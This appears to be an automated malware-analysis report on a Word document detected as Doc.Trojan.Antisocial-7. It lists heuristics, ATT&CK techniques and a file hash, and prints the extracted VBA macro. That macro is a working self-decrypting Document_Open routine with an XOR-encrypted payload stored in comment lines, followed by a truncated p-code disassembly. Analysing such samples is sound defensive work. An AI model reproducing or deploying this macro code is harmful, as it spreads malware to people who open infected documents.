MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when a document is opened. The macro code is obfuscated but appears to deobfuscate and execute further content. The ClamAV heuristic also flags this as a Trojan. The presence of VBA macros and the Document_Open subroutine strongly suggests a malicious document intended to be delivered via spearphishing.
Heuristics 3
-
ClamAV: Doc.Trojan.Antisocial-7 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Antisocial-7
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9795 bytes |
SHA-256: d228c650b29f6e3687ba7312a1522a52ce12d5ab3eba34673b1ccbd5f5e83b77 |
|||
|
Detection
ClamAV:
Doc.Trojan.Antisocial-7
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Application.EnableCancelKey = wdCancelDisabled
For V1 = 17 To 41
v2 = Null
V3 = (ThisDocument.VBProject.vbCoMpoNenTS.Item(1).coDeMoDuLe.LINEs(V1, 1))
v4 = Asc((Mid(V3, 2, 1)))
v5 = v4 Xor 39
For v6 = 4 To Len(V3) Step 2
V7 = Asc(Mid(V3, v6, 1)) Xor v5
v2 = v2 & Chr(V7)
Next
ThisDocument.VBProject.vbCoMpoNenTS.Item(1).coDeMoDuLe.REplaCElINe V1, v2
Next
Demo
End Sub
Private Function Demo()
' GHfi±'!b“UíUôh]U÷'ÅUkb(tÈRêjëBÎ'Wi£b� ÐSç
' ºA¡h;U˜'SF³'û:v'%6Õ0Í'—S^hµ'Ò3.6È
'/‡j³(J5B(Óf‘}Êdqdj
' Èdz'6:q'N%¹ {%N'¨!ò'‰/És=oUnÍT7C²h×DRéJÛb?I-S=):Q^EµwýU¹hqMÞB±DÂs3)¾qLeTdïhQJŒwfh]ißb$iìsât–)xn²s÷b³J®/V6}.t)ÅDühõCÇBÖj‰hoc¯r3k*bN):kùN2I·bšts/zF“+¤'Ô6Ê.]./
'#2`8$†9Ð$ M|J¨pÑ,ºv:jé`Ñ,‰-Ö$r.è$õ<V-¶$ˆ/'$ó5)
'%½dÄm¯pÙ"©GÄ"7?�"q3W"[VãM|"ÌNÌG0L'*‡A¶+¹
'%,D¾"á?µ"nCXQàaˆ*�o¥K`f„*—Ai.�"`G0.i"Ü3©+È+µ"áZ°MYpð"ªfà
'&ÑH9G¼!þGž!‚=^!g8Æ1X!-@ªoWe"!ÈGO!h?-!17.4î!*u$iPd²oê
'#EMæb–$–MÑJ,pÙ,ÌV¯jû`i$2.é$á5§5º-÷$U:,$ì1Ü$JpµL%a÷JU$Žb…$ý9S$âBn$ƒ/©$ð7ê6ç
'%âg3n–Q½gcKnD²"xDf"É>ð"Ÿ3=0Z0ä"²CwlõFa"Àd6"£<ð";;Ô5Q"ýVjj¿G·lÇ
'#|mãb0$WMIJ4p¿,@V¬J `u$M.t$æ5|54-ü$†:Ã$_1Q$ªpÁL™a®J¸$ŒBØ$À9 $pb<$ô)Ò$´7š6
'#!A[jÌ`ó$ªm7BÃ
'%£@l"ƒ?û"ù@ª"˜$B"sAôj¡p…*¤d]+á"3$u"ÛAäjíP¦*:KÌl‘v0**jPÍl=FÙ"æ(ƒ"•0V00•+¡"�)Z"c1ž1Õ+p+š
'#¦JwaE|êPó$µA0
'!mrONáo4U‚BFIjEðS4kŽCÉHurl(ƒpÜD'VttýiÚl�Cgeêrë(|P€Dqe(iSKôVãiKhˆcTHsR¡Uy(úoâréC0kÄ.£7ê/'(lEÁijbÍCÉk*iõbMs¿jìc(XTßcÈV)J,gýEhc™j2okHNc–&4gm*Ì&ï$k!ð$v&S `&Õdí
'#1J‚a‹|OpÜ$veO
'%óm0r!v|kÃm"lWQñ,™T[k�PûW¿q}RlP®M¸v'gÛaLvxK¥mÓlÁ"Ÿ?2"q2Z
'!ƒilvOrâoÂi=h¢U¡(DUaG’P‘C7HxIXtˆk_GQJ^V$t5IQk®v£Rr&E;ì&}61
'$ïLçS~W›JLëmìPÁ-æ@¦l¬MEeƒJ¡q·n!@Çl*M…U¬F8q*PÜJ´l?mÖP9#´>É#C3=
'%ÝV§F'"Ù?9"´VwJŠKùq?fam aÌw0O¸G=lHv…,lt�@Ðr«P²M;H°gña.v‹,¿t`´A¡MÊoår¼m@LNgUliváq—,0KMV]gyož*ã3£+¿,øaûmsfÙgŽO�m—FeWânµGë,CNÖKhL\gïqÓ*>3–.é")VJJHk�qOfÝmVa2Wîoðg×LŽvG,ót6@är˜pTMöh¤goa–v°,�tX`uA¦M›oËR*môlÖGNL™V¤Qä,rKþvCGYO×*Ÿ3�+ï,òa7m…Fžg o~m3fíWÜNôGÉ,ÆA5mPwöLævÏMõDTn—k‹lvg�qä+µ
'/ÇF#gÜzËE«iüD¸\êm�eµX‰D…Iè|µMi&^^'J;Xqz…gÔb8MkkÅ|ó&5~œJlk…g¸e"XßgbF²M‹F»\r[y&ªA¹|ZmÒE8 {9v!Ž&ük¾gŒL®m0e7GËLà}ÌDžm–&×LÍmCdöM¡\ùM)dyArf™M�{¶(‹9J$>(ÎF‡g5zøE©i.D‡\XmYE[xßdüi·|ém'&z^®JþX·zoGgb%m`kž|p&°~NJwKÔgÁEõXrGoFPm§f|\$[Ê&šA)|SmõES %9¢!!&¬kAg.ltMRe¿GRl\}uDîm�&ðKZgo]µfž|�GŠnüdTaÊFæm&{$
'"dKÔjÖW¯h†dÅIzQÝ`xhñUZi‚D1Q¡`3+ÞSJguKw‹JÑOÇ`çF3Qå+~SÑGâF°jÑHnU•JˆKÂ`¥KúQäv”+¦lfQ`©h¨-å4 ,y+ôfMJ‰A«`çHíjŸAÊPðiR`â+IdqA�a”cpWTJ‡hCvÄq—w7lMkŸBí%ÇqÝA3
'%ÈC›aKV{KXtdgæF{m±amWÙoUGÓL vñ,ÊTA@‡R×PPm®hÒg!a×Vò,VtS`kAÇMÔo$RÁMæLOg2lmVóqô,þKÅVÜGuOÖ*Ô3,+¥,iaŒMXFŠgTO)m’f€w$n¶G™,¦fõgæNtgEV¢GÏn÷kklåGMQå"3t.«"?c¡a”vËKÛTŸGlF£M„aÐwßorG„l‚vû,ùTn@ar–P•m¬hŽg)a+vz,gtê`£A£m¾oXrwmîL¾G¸lhv†q×,ÁkZvMG¥Oµ*23‰+©,¯aãmŽF$gÕoZM–f W;nÙg¬,@A$M!W¸l¸Vém~D�nrK2lsGmq§
'/ðinkœ|*a7~ÔM´lÙG-Kê}MEüM›f‹|œ&Û^wjJX�z4g«B´m˜ky|Y&w~Ðj¼K–góE=X®Gïf‰MõfZ\w[)&>AB|çmÀe¹ }9¶!%&lkCGƒL¼mÛE#G1l0}÷DTmY&DIéLBLFnêZ”G¬eÐ{â|½z´ApF•OT(Î\ÒL†
' ŸF"dPsîN¿Q½BICòH¨DTréJ_B<iiS')»t’F"qSbÄfStZ'hAånIKïb6IÄF�jêB"=D:;FÓDKspnzqob5cìHˆD+R¹JlBLIîsd)¦A¶r!K²K-IÝffj/Be
End Function
' Processing file: /opt/analyzer/scan_staging/44f9906c0eb04548b7f27398ed3f6aa9.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 11286 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #2:
' StartForVariable
' Ld V1
' EndForVariable
' LitDI2 0x0011
' LitDI2 0x0029
' For
' Line #3:
' LitVarSpecial (Null)
' St v2
' Line #4:
' Ld V1
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd vbCoMpoNenTS
' ArgsMemLd Item 0x0001
' MemLd coDeMoDuLe
' ArgsMemLd LINEs 0x0002
' Paren
' St V3
' Line #5:
' Ld V3
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' ArgsLd Asc 0x0001
' St v4
' Line #6:
' Ld v4
' LitDI2 0x0027
' Xor
' St v5
' Line #7:
' StartForVariable
' Ld v6
' EndForVari
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.